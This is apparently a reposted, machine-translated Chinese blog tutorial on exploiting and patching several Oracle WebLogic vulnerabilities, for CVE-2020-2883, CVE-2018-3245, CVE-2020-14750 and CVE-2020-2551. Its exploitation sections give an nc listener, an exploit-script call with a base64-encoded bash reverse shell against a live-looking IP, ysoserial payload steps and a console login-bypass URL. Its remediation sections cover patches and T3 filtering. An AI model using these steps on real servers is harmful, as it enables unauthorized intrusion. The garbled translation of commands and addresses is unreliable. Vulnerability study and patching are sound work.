weblogic攻击,weblogic漏扫

　　所有文章仅供安全研究和学习，风险自担！

　　weblogic、WebLogic反序列化(CVE-2020-2883)0x01漏洞描述0x02影响范围0x03漏洞利用0x04漏洞修复二、Weblogic远程代码执行(CVE-2018-3245)0x01漏洞描述0x02影响范围0x03漏洞利用0x04漏洞修复4.1官方升级4.2其他解决方案三、Weblogic特权绕过漏洞(CVE-2020-14750)0x01漏洞描述0x02影响范围0x03漏洞利用0x04漏洞修复四、 Weblogic反序列化(CVE-2020-2551)0x01漏洞描述0x02范围0x03漏洞修复0x04 weblogic反序列化(CVE-2020-2883)重现weblogic远程代码执行(CVE-2020-14882)weblogic远程代码执行(C VE-2019-2725)weblogic反序列化(CVE-2019-2729)重现WebLogic反序列化(CVE-2018-2628)漏洞重现

　　#前言Oracle融合中间件(Oracle Fusion Middleware)是一套面向甲骨文企业和云环境的业务创新平台。平台提供中间件、软件集合等功能。Oracle WebLogic Server是适用于云环境和传统环境的应用服务器组件之一。漏洞

　　CVE-2019-2725

　　CVE-2019-2729

　　CVE-2018-3191

　　CVE-2018-2628

　　CVE-2018-2893

　　CVE-2018-2894

　　CVE-2017-3506

　　CVE-2017-10271

　　CVE-2017-3248

　　CVE-2016-0638

　　CVE-2016-3510

　　CVE-2015-4852

　　CVE-2014-4210

　　SSRF控制台弱命令，部署webshell

　　CVE-2019-2729频繁出现。

　　一、weblogic反序列化(CVE-2020-2883)0x01漏洞描述在Oracle官方发布的2020年4月CPU(关键补丁更新)关键补丁中，有两个是针对WebLogic Server的，CVS3.0是严重漏洞(CVE-2020-2883，CVE-2020-2884)，分值为9.8，允许未经认证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server。成功利用该漏洞可导致攻击者接管WebLogic Server，从而远程执行代码。

　　0x02影响范围Oracle WebLogic Server 10.3.6.0.0

　　Oracle WebLogic Server 12.1.3.0.0

　　Oracle WebLogic Server 12.2.1.3.0

　　Oracle WebLogic Server 12.2.1.4.0

　　0x03利用端口7001

　　(1)访问/console目录

　　Ip:端口/控制台

　　自动跳转到

　　http://118 . 193 . 36 . 37:50128/console/log in/loginform . JSP

　　成功确认weblogic无人机。

　　(2)反弹壳

　　攻击机监控

　　nc -lvvp端口端口使用脚本反弹外壳。

　　外壳需要通过网站编码。

　　外壳编码

　　Python3执行

　　python CVE _ 2020 _ 2883 _ exp . py-u http://118 . 193 . 36 . 37:50128/-c bash-c { echo，YmFzaCAtaSA jiavzgv 2 L3 rjcc 8 xmtkumjkunjcunc 85 odk 3ida JjE=} { base64，-d}{bash，-i}

　　弹壳成功。

　　检查标志

　　0x04漏洞修复1。官方修复方案

　　Oracle已发布修补程序来修复上述漏洞。请参考官方公告及时下载受影响产品的补丁，并参考补丁安装包中的自述文件进行安装更新，确保长期有效防护。

　　注意：Oracle官方补丁要求用户持有正版软件的授权帐户。登录https://support.oracle.com后，他们可以下载最新的补丁。

　　2.临时解决方案

　　用户可以通过控制T3协议的访问来暂时阻止针对这些漏洞的攻击。该方法如下：

　　进入WebLogic控制台，在base_domain的配置页面，进入“安全”选项卡页面，点击“过滤”进入连接过滤配置。

　　在连接过滤器中输入：WebLogic . security . net . connectionfilterimpl，参考下面的编写方法，在连接过滤器规则中配置符合企业实际情况的规则：

　　27.0.0.1 * *允许t3 t3s本地IP * *允许t3t3s允许访问IP * *允许t3t3s * *拒绝t3t3s。如果规则保存后没有生效，建议重启WebLogic服务(重启WebLogic服务会造成业务中断，建议相关人员评估风险后再操作)。

　　二。Weblogic远程代码执行(CVE-2018-3245)0x01漏洞描述：WebLogic是美国甲骨文公司生产的应用服务器。它是一个基于JAVAEE架构的中间件。WebLogic是一个Java应用服务器，用于开发、集成、部署和管理大规模分布式web应用、网络应用和数据库应用。该漏洞可以通过利用RMI机制的缺陷来执行任意反序列化代码。攻击者可以在未经授权的情况下将有效载荷封装在T3协议中，通过反序列化T3协议中的有效载荷，攻击者可以远程攻击易受攻击的WebLogic组件，执行任意代码并获得目标系统的所有权限。

　　在weblogic中，攻击者利用其他rmi绕过weblogic黑名单的限制，然后用readObject解析加载的内容，造成反序列化远程代码执行的漏洞。该漏洞主要由T3服务触发。WebLogic console 7001所有开放的端口都会默认开放T3服务，攻击者可以通过发送构造的T3协议数据获得目标服务器的权限。

　　0x02影响范围Weblogic 10.3.6.0

　　Weblogic 12.1.3.0

　　WebLogic 12.2.1.3

　　0x03利用https://github.com/ianxtianxt/CVE-2018-3245

　　第一步

　　Java-jar yso serial-CVE-2018-3245 . jar

　　为什么这么连环？

　　用法：Java-jar ysos erial-CVE-2018-3245 . jar[有效负载][命令]

　　可用有效负载类型：

　　有效负载作者依赖关系

　　- - -

　　CVE _ 2018 _ 2893 _ 1 @姆贝希勒

　　CVE _ 2018 _ 2893 _ 2 @姆贝希勒

　　CVE _ 2018 _ 2893 _ 3 @姆贝希勒

　　CVE_2018_3245 @mbechler

　　JRMPClient @mbechler

　　Jdk7u21 @frohoff

　　第二步

　　Java-jar ysos erial-CVE-2018-3245 . jar CVE _ 2018 _ 3245 "[RMI _ SERVICE _ IP]:[PORT]" POC 5 . ser

　　第三步

　　python WebLogic . py[目标主机][端口] poc5。

　　0x04漏洞修复4.1正式升级Oracle官方在本次关键补丁更新(CPU)中修复了该漏洞。请参考官方通知3359 www.oracle.com/technetwork/security-advisory/CPU Oct2018-4428296.html #附录FW，或绿色联盟技术安全预警微信微信官方账号文章《Oracle全系产品2018年10月关键补丁更新（CPU）》的附录部分，及时下载受影响的产品更新补丁，并参考补丁安装包中的自述文件进行安装更新，确保长期有效防护。

　　注意：Oracle官方补丁要求用户持有正版软件的授权帐户。登录https://support.oracle.com后，他们可以下载最新的补丁。

　　4.2其他解决方案由于Weblogic使用黑名单来防止恶意反序列化，所以此次发布的补丁仍有可能被绕过。最新版本的jdk引入了JEP290增强的安全机制，防止java反序列化导致的任意代码执行。使用weblogic的用户可以通过将jdk升级到最新版本来保护此漏洞。

　　Jdk版本升级建议：

　　1.8版升级到8u121或以上。

　　1.7版升级到7u131或更高版本。

　　1.6版升级到6u141或更高版本。

　　三。WebLogic特权绕过漏洞(CVE-2020-14750)0x01漏洞描述Oracle融合中间件(Oracle Fusion Middleware)是一套面向甲骨文企业和云环境的业务创新平台。平台提供中间件、软件集合等功能。

　　Oracle WebLogic Server Oracle Fusion Middleware Console的多个版本中存在一个安全漏洞，可绕过CVE-2020-14882修补程序。远程攻击者可以构建一个特殊的HTTP请求，并在未经身份验证的情况下接管WebLogic Server控制台，从而执行任意代码。

　　CVE-2020-14750是WebLogic控制台授权验证绕过的漏洞。CVE-2020-14882补丁绕过漏洞，CVSS 9.8分。绕过CVE-2020-14882补丁后，攻击者可以再次绕过控制台Console的权限检查，访问原本需要登录的资源和界面功能。虽然后台任意代码执行漏洞CVE-2020-14883已经修复，但攻击者仍然可以找到其他合适的后台接口，在目标服务器上执行任意恶意代码，并获得系统权限。

　　0x02势力范围Oracle:Weblogic:

　　10.3.6.0.0

　　12.1.3.0.0

　　12.2.1.3.0

　　12.2.1.4.0

　　14.1.1.0.0

　　0x03漏洞观察正常成功登录页面的URL(默认账号密码weblogic/weblogic)

　　http://127 . 0 . 0 . 1:7001/console/console . portal？_ nfpb=true _ page label=home page 1构造URL以绕过登录

　　3358127 . 0 . 0 . 1:7001/控制台/图像/%2E。/console.portal此处的% 2e是。辅助url编码

　　成功绕过登录：

　　0x04漏洞修复下载官方补丁修复。

　　四。weblogic IIOP反序列化(CVE-2020-2551)0x01漏洞描述IIOP:IIOP是CORBA的通信协议。它定义了如何通过CORBA客户机和服务器之间的连接发送比特。

　　说明：Oracle融合中间件(Oracle Fusion Middleware)是一套面向甲骨文企业和云环境的业务创新平台。平台提供中间件、软件集合等功能。WebLogic Server是适用于云环境和传统环境的应用服务器组件之一。该漏洞在原理上类似于RMI反序列化漏洞(CVE-2017-3241)，也类似于之前T3协议导致的一系列反序列化漏洞，都是由于调用远程对象的实现存在缺陷，使得序列化的对象可以在没有安全检查的情况下任意构造。

　　受WebLogic反序列化漏洞影响的协议是IIOP协议。此漏洞是由于调用远程对象的实现中的缺陷造成的，该缺陷导致序列化对象的任意构造。在使用前不进行安全检查的情况下，攻击者可以通过IIOP协议远程访问Weblogic Server上的远程接口，导入恶意数据，从而获得服务器权限，并在未经授权的情况下远程执行任意代码。

　　0x02影响范围

　　12.1.3.0.0

　　12.2.1.3.0

　　12.2.1.4.0

　　0x03利用0x04利用修复weblogic反序列化(CVE-2020-2883)以重现https://blog.csdn.net/YouthBelief/article/details/121133195

　　https://blog.csdn.net/YouthBelief/article/details/121132932 WebLogic远程代码执行(CVE-2020-14882)

　　https://blog.csdn.net/YouthBelief/article/details/121119954 WebLogic远程代码执行(CVE-2019-2725)

　　Weblogic反序列化(CVE-2019-2729)重现https://blog.csdn.net/YouthBelief/article/details/121115028

　　https://blog.csdn.net/YouthBelief/article/details/121091060 WebLogic反序列化(CVE-2018-2628)漏洞重现

　　https://blog.csdn.net/YouthBelief/article/details/121102189 WebLogic远程代码执行(CVE-2018-3245)

　　Weblogic远程代码执行(CVE-2018-2893)重现https://blog.csdn.net/YouthBelief/article/details/121096673

　　https://blog.csdn.net/YouthBelief/article/details/121090668 WLS-wsat组件远程命令执行(CVE-2017-3506)

　　https://blog.csdn.net/YouthBelief/article/details/121088780的Weblogic反序列化(CVE-2017-10271)

郑重声明：本文由网友发布，不代表盛行IT的观点，版权归原作者所有，仅为传播更多信息之目的，如有侵权请联系，我们将第一时间修改或删除，多谢。